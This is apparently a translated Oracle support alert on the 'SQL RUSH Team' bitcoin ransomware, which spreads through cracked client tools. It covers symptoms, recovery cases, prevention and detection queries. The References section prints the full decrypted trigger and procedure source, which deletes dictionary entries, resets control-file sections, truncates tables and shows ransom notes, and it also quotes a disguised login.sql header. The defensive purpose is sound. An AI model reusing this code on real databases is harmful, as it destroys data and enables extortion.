The "Bitcoin Attack" on Oracle Databases and How to Protect Against It

ALERT: Databases are at risk of the bitcoin attack

APPLIES TO:
Oracle Database - any Edition - any Version
Information in this document applies to any platform.
DESCRIPTION
When users connect to the database with a client tool, or in the database alert log, errors such as ORA-20312/ORA-20313/ORA-20315 appear stating that the database has been locked and that bitcoin must be sent to a given address to unlock it.
OCCURRENCE
The customer connects to the database with a maliciously modified "portable" or cracked client tool (for example a cracked copy of PL/SQL Developer or Toad). After the connection succeeds, such a tool runs an injected SQL script (Login.sql, AfterConnect.sql, toad.ini and the like) that executes malicious code and creates three triggers and four stored procedures in the database.
When the database is restarted or a user connects, the triggers call the corresponding stored procedures, which can damage the database and raise the error and ransom messages.
SYMPTOMS
When users connect to the database with a client tool, or in the database alert log, errors such as ORA-20312/ORA-20313/ORA-20315 appear stating that the database has been locked and that bitcoin must be sent to a given address to unlock it. The injected scripts disguise themselves as Oracle internal programs:
--
-- Copyright (c) 1988, 2011, Oracle and/or its affiliates.
-- All rights reserved.
--
-- NAME
-- login.sql
--
-- DESCRIPTION
-- PL/SQL global login "site profile" file
--
-- Add any PL/SQL commands here that are to be executed when a
-- user starts PL/SQL, or uses the PL/SQL CONNECT command.
--
-- USAGE
-- This script is automatically run
--
-- This SQL was created by Oracle ; You should never remove/delete it!
-- MODIFIED (MM/DD/YY)
-- ……
The two known error messages are as follows:
Example 1:
Alert.log entry:
Thu Apr 13 13:48:55 2017
Errors in file /oracle/diag/rdbms/liantiaodb/liantiaodb/trace/liantiaodb_ora_5213.trc:
ORA-00604: 遞歸 SQL 級別 1 出現錯誤
ORA-20315: 你的數據庫已被SQL RUSH Team鎖死 發送5個比特幣到這個地址 166xk1FXMB2g8JxBVF5T4Aw1Z5JaZ6vrSE (大小寫一致) 之後把你的Oracle SID郵寄地址 [email protected] 我們將讓你知道如何解鎖你的數據庫 Hi buddy, your database was hacked by SQL RUSH Team, send 5 bitcoin to address 166xk1FXMB2g8JxBVF5T4Aw1Z5JaZ6vrSE (case sensitive), after that send your Oracle SID to mail address [email protected], we will let you know how to unlock your database.
ORA-06512: 在 "AIQRY.DBMS_CORE_INTERNAL ", line 25
ORA-06512: 在 line 2
Example 2: error when connecting to the database with a client tool:
Encrypted (wrapped) stored procedures exist in the database with the following names:
"DBMS_SUPPORT_INTERNAL "
"DBMS_ SYSTEM_INTERNAL "
"DBMS_ CORE_INTERNAL "
"DBMS_STANDARD_FUN9"
The three triggers are named:
"DBMS_SUPPORT_INTERNAL "
"DBMS_ SYSTEM_INTERNAL "
"DBMS_ CORE_INTERNAL "
WORKAROUND
None
SOLUTION
The handling for the bitcoin attack cases found so far is as follows:
1. Remove the maliciously modified client software.
2. Handle according to the situation:
Case one:
SYSDATE-MIN(LAST_ANALYZED) less than 1200 days
Database damage: none
Handling:
a. Drop the three triggers:
"DBMS_SUPPORT_INTERNAL "
"DBMS_ SYSTEM_INTERNAL "
"DBMS_ CORE_INTERNAL "
b. Drop the four stored procedures:
"DBMS_SUPPORT_INTERNAL "
"DBMS_ SYSTEM_INTERNAL "
"DBMS_ CORE_INTERNAL "
"DBMS_STANDARD_FUN9"
Case two:
SYSDATE-MIN(LAST_ANALYZED) greater than 1200 days, and either SYSDATE-CREATED greater than 1200 days but the database has not been restarted, or SYSDATE-CREATED less than 1200 days
Database damage: some tables have been truncated
Handling:
a. Drop the three triggers and the four stored procedures
b. Restore the tables from backup to the state before the truncate
c. Recover with DUL (not every table can necessarily be recovered, e.g. if the truncated space has already been reused)
Case three:
SYSDATE-CREATED greater than 1200 days
Database damage: some tables have been truncated and entries in tab$ have been deleted
Handling:
a. Drop the three triggers and the four stored procedures
b. Restore the tables from backup to the state before the truncate
c. Restore tab$ from the table whose name begins with ORACHK
d. Recover with DUL (not every table can necessarily be recovered, e.g. if the truncated space has already been reused)
Preventive measures against the bitcoin attack:
1. Monitor the database for the triggers and stored procedures listed above, and drop them promptly if found.
2. Restrict the use of DBA privileges.
3. Check the automatic login scripts of the client tools and remove risky scripts:
glogin.sql/login.sql in SQL*Plus
toad.ini in Toad
login.sql/AfterConnect.sql in PL/SQL Developer
4. Download tools from the vendor's official site; do not use portable/cracked versions.
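Queries a DBA can use for the monitoring in prevention step 1 and for deciding which case of the Solution section applies, as an added example that is not part of the original note; `<owner>` is a placeholder for the schema that the first query reports, and the views used are standard Oracle data-dictionary views.

```sql
-- Added example (not from the note): detection and triage queries for the
-- objects this note describes. Run as a DBA; <owner> is a placeholder.

-- 1. Find the three triggers and four procedures. The stored names carry a
--    trailing (or stray) space, so normalise before comparing.
SELECT owner, object_type, object_name, created, status
  FROM dba_objects
 WHERE object_type IN ('TRIGGER', 'PROCEDURE')
   AND REPLACE(object_name, ' ', '') IN ('DBMS_SUPPORT_INTERNAL',
       'DBMS_SYSTEM_INTERNAL', 'DBMS_CORE_INTERNAL', 'DBMS_STANDARD_FUN9')
 ORDER BY owner, object_type, object_name;

-- 2. Startup/logon triggers are rare; list every one so that a renamed copy
--    of the same mechanism is not missed.
SELECT owner, trigger_name, triggering_event, base_object_type, status
  FROM dba_triggers
 WHERE base_object_type = 'DATABASE'
    OR (base_object_type = 'SCHEMA' AND UPPER(triggering_event) LIKE '%LOGON%');

-- 3. Traces the procedures leave behind: the ORACHK<guid> copy of sys.tab$
--    made before the delete, and the DBMS_JOB entries that run the truncates.
SELECT owner, table_name, tablespace_name
  FROM dba_tables
 WHERE table_name LIKE 'ORACHK%';

SELECT job, log_user, schema_user, what
  FROM dba_jobs
 WHERE UPPER(what) LIKE '%DBMS_STANDARD_FUN9%';

-- 4. The two ages the procedures compare against 1200 days; these decide
--    which case (one, two or three) of the Solution section applies.
SELECT ROUND(SYSDATE - created) AS days_since_created FROM v$database;

SELECT ROUND(SYSDATE - MIN(last_analyzed)) AS days_since_oldest_stats
  FROM dba_tables
 WHERE tablespace_name NOT IN ('SYSTEM', 'SYSAUX', 'EXAMPLE');

-- 5. Removal for case one. The identifiers must be quoted exactly as stored,
--    trailing space included; substitute the owner found by query 1.
DROP TRIGGER <owner>."DBMS_SUPPORT_INTERNAL ";
DROP TRIGGER <owner>."DBMS_SYSTEM_INTERNAL ";
DROP TRIGGER <owner>."DBMS_CORE_INTERNAL ";
DROP PROCEDURE <owner>."DBMS_SUPPORT_INTERNAL ";
DROP PROCEDURE <owner>."DBMS_SYSTEM_INTERNAL ";
DROP PROCEDURE <owner>."DBMS_CORE_INTERNAL ";
DROP PROCEDURE <owner>.DBMS_STANDARD_FUN9;
```

Query 1 should be run on a schedule as the monitoring the note recommends; any row returned, or any unexpected DATABASE-level trigger from query 2, warrants the triage in queries 3 and 4 before anything is dropped.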
REFERENCES
Code of the three triggers:
PROMPT Create "DBMS_SUPPORT_INTERNAL "
create or replace trigger "DBMS_SUPPORT_INTERNAL "
after startup on database
begin
"DBMS_SUPPORT_INTERNAL ";
end;
/
CREATE OR REPLACE TRIGGER "DBMS_SYSTEM_INTERNAL "
AFTER LOGON ON DATABASE
BEGIN
"DBMS_SYSTEM_INTERNAL ";
END;
/
CREATE OR REPLACE TRIGGER "DBMS_CORE_INTERNAL "
AFTER LOGON ON SCHEMA
BEGIN
"DBMS_CORE_INTERNAL ";
END;
/
The four encrypted (wrapped) stored procedures, after decryption:
PROCEDURE "DBMS_SUPPORT_INTERNAL " IS
DATE1 INT :=10;
E1 EXCEPTION;
PRAGMA EXCEPTION_INIT(E1, -20312);
BEGIN
SELECT NVL(TO_CHAR(SYSDATE-CREATED ),0) INTO DATE1 FROM V$DATABASE;
IF (DATE1>=1200) THEN
EXECUTE IMMEDIATE 'create table ORACHK'||SUBSTR(SYS_GUID,10)||' tablespace system as select * from sys.tab$';
DELETE SYS.TAB$ WHERE DATAOBJ# IN (SELECT DATAOBJ# FROM SYS.OBJ$ WHERE OWNER# NOT IN (0,38)) ;
COMMIT;
EXECUTE IMMEDIATE 'alter system checkpoint';
SYS.DBMS_BACKUP_RESTORE.RESETCFILESECTION(11);
SYS.DBMS_BACKUP_RESTORE.RESETCFILESECTION(12);
SYS.DBMS_BACKUP_RESTORE.RESETCFILESECTION(13);
SYS.DBMS_BACKUP_RESTORE.RESETCFILESECTION(14);
FOR I IN 1..2046 LOOP
DBMS_SYSTEM.KSDWRT(2, 'Hi buddy, your database was hacked by SQL RUSH Team, send 5 bitcoin to address 166xk1FXMB2g8JxBVF5T4Aw1Z5JaZ6vrSE (case sensitive), after that send your Oracle SID to mail address [email protected], we will let you know how to unlock your database.');
DBMS_SYSTEM.KSDWRT(2, '你的數據庫已被SQL RUSH Team鎖死 發送5個比特幣到這個地址 166xk1FXMB2g8JxBVF5T4Aw1Z5JaZ6vrSE (大小寫一致) 之後把你的Oracle SID郵寄地址 [email protected] 我們將讓你知道如何解鎖你的數據庫');
END LOOP;
RAISE E1;
END IF;
EXCEPTION
WHEN E1 THEN
RAISE_APPLICATION_ERROR(-20312,'你的數據庫已被SQL RUSH Team鎖死 發送5個比特幣到這個地址 166xk1FXMB2g8JxBVF5T4Aw1Z5JaZ6vrSE (大小寫一致) 之後把你的Oracle SID郵寄地址 [email protected] 我們將讓你知道如何解鎖你的數據庫 Hi buddy, your database was hacked by SQL RUSH Team, send 5 bitcoin to address 166xk1FXMB2g8JxBVF5T4Aw1Z5JaZ6vrSE (case sensitive), after that send your Oracle SID to mail address [email protected], we will let you know how to unlock your database.');
WHEN OTHERS THEN
NULL;
END;
/
PROCEDURE "DBMS_SYSTEM_INTERNAL " IS
DATE1 INT :=10;
E1 EXCEPTION;
PRAGMA EXCEPTION_INIT(E1, -20313);
BEGIN
SELECT NVL(TO_CHAR(SYSDATE-MIN(LAST_ANALYZED)),0) INTO DATE1 FROM ALL_TABLES WHERE TABLESPACE_NAME NOT IN ('SYSTEM','SYSAUX','EXAMPLE');
IF (DATE1>=1200) THEN
IF (UPPER(SYS_CONTEXT('USERENV', 'MODULE'))!='C89239.EXE')
THEN
RAISE E1;
END IF;
END IF;
EXCEPTION
WHEN E1 THEN
RAISE_APPLICATION_ERROR(-20313,'你的數據庫已被SQL RUSH Team鎖死 發送5個比特幣到這個地址 166xk1FXMB2g8JxBVF5T4Aw1Z5JaZ6vrSE (大小寫一致) 之後把你的Oracle SID郵寄地址 [email protected] 我們將讓你知道如何解鎖你的數據庫 Hi buddy, your database was hacked by SQL RUSH Team, send 5 bitcoin to address 166xk1FXMB2g8JxBVF5T4Aw1Z5JaZ6vrSE (case sensitive), after that send your Oracle SID to mail address [email protected], we will let you know how to unlock your database.');
WHEN OTHERS THEN
NULL;
END;
/
PROCEDURE "DBMS_CORE_INTERNAL " IS
V_JOB NUMBER;
DATE1 INT :=10;
STAT VARCHAR2(2000);
V_MODULE VARCHAR2(2000);
E1 EXCEPTION;
PRAGMA EXCEPTION_INIT(E1, -20315);
CURSOR TLIST IS SELECT * FROM USER_TABLES WHERE TABLE_NAME NOT LIKE '%$%' AND TABLE_NAME NOT LIKE '%ORACHK%' AND CLUSTER_NAME IS NULL;
BEGIN
SELECT NVL(TO_CHAR(SYSDATE-MIN(LAST_ANALYZED)),0) INTO DATE1 FROM ALL_TABLES WHERE TABLESPACE_NAME NOT IN ('SYSTEM','SYSAUX','EXAMPLE');
IF (DATE1>=1200) THEN
FOR I IN TLIST LOOP
DBMS_OUTPUT.PUT_LINE('table_name is ' ||I.TABLE_NAME);
STAT:='truncate table '||USER||'.'||I.TABLE_NAME;
DBMS_JOB.SUBMIT(V_JOB, 'DBMS_STANDARD_FUN9(''' || STAT || ''');', SYSDATE);
COMMIT;
END LOOP;
END IF;
IF (UPPER(SYS_CONTEXT('USERENV', 'MODULE'))!='C89239.EXE')
THEN
RAISE E1;
END IF;
EXCEPTION
WHEN E1 THEN
RAISE_APPLICATION_ERROR(-20315,'你的數據庫已被SQL RUSH Team鎖死 發送5個比特幣到這個地址 166xk1FXMB2g8JxBVF5T4Aw1Z5JaZ6vrSE (大小寫一致) 之後把你的Oracle SID郵寄地址 [email protected] 我們將讓你知道如何解鎖你的數據庫 Hi buddy, your database was hacked by SQL RUSH Team, send 5 bitcoin to address 166xk1FXMB2g8JxBVF5T4Aw1Z5JaZ6vrSE (case sensitive), after that send your Oracle SID to mail address [email protected], we will let you know how to unlock your database.');
WHEN OTHERS THEN
RAISE_APPLICATION_ERROR(-20315,'你的數據庫已被SQL RUSH Team鎖死 發送5個比特幣到這個地址 166xk1FXMB2g8JxBVF5T4Aw1Z5JaZ6vrSE (大小寫一致) 之後把你的Oracle SID郵寄地址 [email protected] 我們將讓你知道如何解鎖你的數據庫 Hi buddy, your database was hacked by SQL RUSH Team, send 5 bitcoin to address 166xk1FXMB2g8JxBVF5T4Aw1Z5JaZ6vrSE (case sensitive), after that send your Oracle SID to mail address [email protected], we will let you know how to unlock your database.');
END;
/
PROCEDURE DBMS_STANDARD_FUN9(V_DDL IN VARCHAR2)
IS
BEGIN
EXECUTE IMMEDIATE V_DDL;
END;
/